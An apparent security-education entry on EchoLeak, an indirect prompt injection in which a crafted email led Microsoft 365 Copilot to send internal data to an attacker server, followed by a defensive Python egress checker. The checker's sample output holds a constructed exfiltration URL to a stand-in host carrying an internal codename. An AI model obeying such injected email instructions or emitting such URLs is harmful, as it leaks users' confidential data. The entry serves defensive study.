Indirect Prompt Injection · Critical
EchoLeak: zero-click data exfiltration from Microsoft 365 Copilot
June 2025 · Microsoft 365 Copilot
What happened
The first documented zero-click attack on an AI agent (CVE-2025-32711, CVSS 9.3). A single crafted email with hidden instructions caused Copilot to blend untrusted email content with the user's internal data and exfiltrate it to an attacker server, with no click required.
Root cause
An "LLM scope violation": Copilot blended trusted internal sources and untrusted external email without enforcing trust boundaries, enabling indirect injection plus a data-exfiltration path.
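To make the scope violation concrete, here is an added example (not Microsoft's code and not part of this entry) of a defender-side egress check: every context chunk is tagged with its provenance, and any URL in the assistant's output that points outside a hypothetical host allow-list while carrying fragments of trusted data is flagged as exfiltration. The host names, chunk labels and sample context are constructed.

```python
import re
from dataclasses import dataclass
from urllib.parse import unquote, urlparse

@dataclass(frozen=True)
class Chunk:
    source: str     # constructed label, e.g. "inbox" or "sharepoint"
    trusted: bool   # True = tenant-internal data, False = inbound external content
    text: str

# Hypothetical allow-list of hosts the assistant may reference in its output.
ALLOWED_HOSTS = {"sharepoint.example.com", "teams.example.com"}
URL_RE = re.compile(r"https?://[^\s<>()\"']+")

def trusted_fragments(context, min_len=8):
    """Tokens (>= min_len chars) from trusted chunks, used as leakage markers."""
    frags = set()
    for c in context:
        if c.trusted:
            frags.update(w.lower() for w in re.findall(r"[A-Za-z0-9_-]+", c.text)
                         if len(w) >= min_len)
    return frags

def check_response(context, response):
    """Return (url, reason) for each cross-boundary egress found in the response.

    Rule 1: if any untrusted chunk is in the context, an off-allow-list URL in the
            output is treated as possibly attacker-supplied ("untrusted_url").
    Rule 2: if such a URL also embeds fragments of trusted context, it is
            reported as data exfiltration ("exfil:<fragments>").
    """
    has_untrusted = any(not c.trusted for c in context)
    frags = trusted_fragments(context)
    findings = []
    for url in URL_RE.findall(response):
        host = (urlparse(url).hostname or "").lower()
        if host in ALLOWED_HOSTS:
            continue
        leaked = sorted(f for f in frags if f in unquote(url).lower())
        if leaked:
            findings.append((url, "exfil:" + ",".join(leaked)))
        elif has_untrusted:
            findings.append((url, "untrusted_url"))
    return findings

# Constructed sample: one inbound external email plus one internal document,
# and an assistant response that pushes internal data to an external host.
CONTEXT = [
    Chunk("inbox", False, "Re: Q3 planning. Thanks for the update, talk soon."),
    Chunk("sharepoint", True, "Project codename: BLUEHARBOR-2025. Budget approval pending."),
]
RESPONSE = ("Summary ready. ![status](https://evil.example.net/p?d=BLUEHARBOR-2025) "
            "Details: https://sharepoint.example.com/sites/finance")

if __name__ == "__main__":
    for url, reason in check_response(CONTEXT, RESPONSE):
        print(reason, url)
```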
Fix / outcome
Microsoft patched server-side before disclosure; no customer action was required. No in-the-wild exploitation was reported.
Learn this attack class
This incident is an example of Indirect Prompt Injection. Read the guide, then try it hands-on in the Academy.